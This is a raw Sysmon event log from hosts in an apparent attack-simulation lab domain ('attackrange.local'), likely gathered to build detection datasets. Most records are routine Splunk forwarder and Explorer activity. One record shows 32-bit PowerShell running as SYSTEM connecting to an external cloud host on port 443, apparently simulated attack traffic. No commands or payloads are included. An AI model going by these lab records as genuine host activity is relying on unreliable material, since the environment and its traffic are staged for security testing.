Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1B641A99373870010E3CA04D5AF55B98,SHA256=E76E5648AE043DA6EABC14209015EDEBBC339BEC0B31F7A3136B2FD85B9FE712,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105168Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:17.780{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6FF3C41A68074327C823F5D40A2605C1,SHA256=E999F8305DFC9CDC18ADC15A874D7BB1F1559D7598E47AC93E63B34715DC08C4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000151776Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:17.219{39BD8DE3-0FD9-60CA-8B00-00000000D101}19881516C:\Windows\Explorer.EXE{39BD8DE3-131D-60CA-0B01-00000000D101}1192C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151775Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:17.218{39BD8DE3-0FD9-60CA-8B00-00000000D101}19883004C:\Windows\Explorer.EXE{39BD8DE3-131D-60CA-0B01-00000000D101}1192C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62250|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151774Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:17.218{39BD8DE3-0FD9-60CA-8B00-00000000D101}19883004C:\Windows\Explorer.EXE{39BD8DE3-131D-60CA-0B01-00000000D101}1192C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d2c9|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000105169Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:16.819{54715871-FD33-60C9-6D00-00000000CF01}3756C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-681.attackrange.local55438-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 354300x8000000000000000151787Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:16.933{39BD8DE3-4818-60CA-2408-00000000D101}4064C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-14.attackrange.local58418-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 10341000x8000000000000000151786Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:18.134{39BD8DE3-0FD9-60CA-8B00-00000000D101}19881516C:\Windows\Explorer.EXE{39BD8DE3-24EC-60CA-7703-00000000D101}3656C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+62945|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151785Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:18.134{39BD8DE3-0FD9-60CA-8B00-00000000D101}19881516C:\Windows\Explorer.EXE{39BD8DE3-24EC-60CA-7703-00000000D101}3656C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151784Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:18.134{39BD8DE3-0FD9-60CA-8B00-00000000D101}19881516C:\Windows\Explorer.EXE{39BD8DE3-24EC-60CA-7703-00000000D101}3656C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000151783Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:18.134{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0CA95CEFA1EFB65241236B419E884E49,SHA256=15C8EAA6B723D0A42F657281F78BC026D7877A6618F7071A21A6F4B38566AEB7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000151782Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:18.134{39BD8DE3-0FD9-60CA-8B00-00000000D101}19883004C:\Windows\Explorer.EXE{39BD8DE3-24EC-60CA-7703-00000000D101}3656C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+622c0|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151781Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:18.134{39BD8DE3-0FD9-60CA-8B00-00000000D101}19883004C:\Windows\Explorer.EXE{39BD8DE3-24EC-60CA-7703-00000000D101}3656C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47c90|C:\Windows\System32\SHELL32.dll+6227c|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151780Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:18.134{39BD8DE3-0FD9-60CA-8B00-00000000D101}19883004C:\Windows\Explorer.EXE{39BD8DE3-24EC-60CA-7703-00000000D101}3656C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62250|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151779Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:18.134{39BD8DE3-0FD9-60CA-8B00-00000000D101}19883004C:\Windows\Explorer.EXE{39BD8DE3-24EC-60CA-7703-00000000D101}3656C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d2c9|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000151778Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:18.134{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5942D3CCB3ACA1B10F793B47F2B8E16E,SHA256=A287CD3BAD8A27ECC6BCF07D503D759851406E25BB5EFC32E94FF52066687C73,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151777Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:18.016{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9696D508A970F51E33D10C78BE863A86,SHA256=8395EA090874EFBBD7B512B07EB8CEA65877A7284C13195CA5327F9B6F4F3969,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105170Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:19.182{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FBAA3EF595DF95477585947EF59F6EC0,SHA256=55E95ECE950CC6F8EFAD34A10ECC7AA70257EA28DCD209F31A04F05E0E2C3540,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151788Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:19.034{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1E08DD25D0D16757C6C68B305A191705,SHA256=59E341CC95B92344EF7738F329EE9156847AB2A2C282E6A837AC25C82DB80235,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105171Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:20.547{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=129F7F0F2A537A25B382AEC0426D2B27,SHA256=29E5BCDD61758F2C5B804FDFC7C710C1B2549E2F616DF1BCDBCC29BCEC4FF512,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000151792Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:20.049{39BD8DE3-0FD9-60CA-8B00-00000000D101}19881516C:\Windows\Explorer.EXE{39BD8DE3-24EC-60CA-7703-00000000D101}3656C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+62945|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151791Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:20.049{39BD8DE3-0FD9-60CA-8B00-00000000D101}19881516C:\Windows\Explorer.EXE{39BD8DE3-24EC-60CA-7703-00000000D101}3656C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151790Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:20.049{39BD8DE3-0FD9-60CA-8B00-00000000D101}19881516C:\Windows\Explorer.EXE{39BD8DE3-24EC-60CA-7703-00000000D101}3656C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000151789Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:20.034{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=190D28BD8B6C8F1B95D6C4056ECC206B,SHA256=B3D499359758E6795EC4CA675DC03938B762BDCB5D8AE04E4CD3CD54145766ED,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105173Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:21.909{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=41B8D60577766349E288D0F32C289FFE,SHA256=ADD2023755CD093102E5C3B22AE684EFA9885B03DC38CA183A33C4EE3F362A40,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105172Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:21.228{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A0F14062BECA905751215C3387ADE58A,SHA256=9F71A6D5742BFD02AABCB2CDC9E1A772233FB3CBA1320144E65141E8BA1D0C33,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151793Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:21.049{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DD48ACCC0498813F0B712B0F2DECFDB9,SHA256=253721C1DA81ED3ADA64A7552627686ABB4ACBAF98FDC685C74DAB1BEBC8BE04,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000105174Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:21.142{54715871-FD28-60C9-2F00-00000000CF01}2148C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-681.attackrange.local53domainfalse10.0.1.15ip-10-0-1-15.us-west-2.compute.internal49601- 23542300x8000000000000000151795Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:22.451{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0CA95CEFA1EFB65241236B419E884E49,SHA256=15C8EAA6B723D0A42F657281F78BC026D7877A6618F7071A21A6F4B38566AEB7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151794Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:22.050{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5277503A793BAECA648EA6AB4B01E390,SHA256=5E07E6EE2AF71B3499222C4904D359352B990AF96649300E47107965DE38E624,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105175Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:23.274{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CBDC6F95440BDDEBB8976007074B7FCD,SHA256=F09885AE705DC177E0082C953AB77015B77D5A474843B937A0B53ED1F8783433,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000151800Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:21.293{39BD8DE3-26DA-60CA-F703-00000000D101}5228C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-14.attackrange.local58419-false34.218.235.219ec2-34-218-235-219.us-west-2.compute.amazonaws.com443https 10341000x8000000000000000151799Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:23.382{39BD8DE3-0FD9-60CA-8B00-00000000D101}19882956C:\Windows\Explorer.EXE{39BD8DE3-131D-60CA-0B01-00000000D101}1192C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+55af0|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF801C50EF8C8)|UNKNOWN(FFFF9B90A66B4A68)|UNKNOWN(FFFF9B90A66B4BE7)|UNKNOWN(FFFF9B90A66AF271)|UNKNOWN(FFFF9B90A66B0C3A)|UNKNOWN(FFFF9B90A66AEEF6)|UNKNOWN(FFFFF801C4E06E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+5935b|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad 10341000x8000000000000000151798Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:23.382{39BD8DE3-0FD9-60CA-8B00-00000000D101}19882956C:\Windows\Explorer.EXE{39BD8DE3-131D-60CA-0B01-00000000D101}1192C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+555d1|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF801C50EF8C8)|UNKNOWN(FFFF9B90A66B4A68)|UNKNOWN(FFFF9B90A66B4BE7)|UNKNOWN(FFFF9B90A66AF271)|UNKNOWN(FFFF9B90A66B0C3A)|UNKNOWN(FFFF9B90A66AEEF6)|UNKNOWN(FFFFF801C4E06E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+5935b|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000151797Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:23.382{39BD8DE3-131D-60CA-0B01-00000000D101}1192WIN-HOST-14\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms~RF17f9301.TMPMD5=2C01CABB664DCA78393A9C410B7040DB,SHA256=E2BCE1F5539DFFCCEDF4DA06C8D5B510DA58D14487D15A58F832D3B1C9C48C79,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151796Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:23.051{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BFE6A8AE63534A3BE5BE144A182255BA,SHA256=C3D730F7E8FF89305893053D99FD76DFEF43DB9DFEF54C7BA56BE566A3C36FDD,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000105177Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:22.794{54715871-FD33-60C9-6D00-00000000CF01}3756C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-681.attackrange.local55439-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000105176Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:24.643{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9BBF7A3A8F30CB316C651E2BB6E7AAFA,SHA256=BB4ED14FD498F67963FCD3B75CF01D0B50FD880592442CF0CDB8EA0E4A247D64,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000151802Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:22.033{39BD8DE3-4818-60CA-2408-00000000D101}4064C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-14.attackrange.local58420-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000151801Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:24.066{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8FA3CC3DB885AE49E783932018DDD433,SHA256=C3584ED10B7E37CFD044B5F800CCF933D98C7FBD349734048E04C61C23021A52,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151803Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:25.080{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D3F006FC7B504BA743EE8EE476BE09CF,SHA256=DFDAF152614BC32887484B2DE7187400D7A9F467ED32F3531434E5911F1B3222,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105178Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:26.008{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A97A321C9B39D90825DC296F4A518CC1,SHA256=6222195F8466C2B6EBD9BBDE6D2953FAD4BF01A3F197935E14AAD94A362EBE23,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151804Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:26.095{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C3D5AE050CB1C67DA5B4001A56CC3A81,SHA256=6CEE95D9BA4D5A91B1114078D5FE2953931A750733E434D57BEF0E64F1484F79,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105179Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:27.377{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 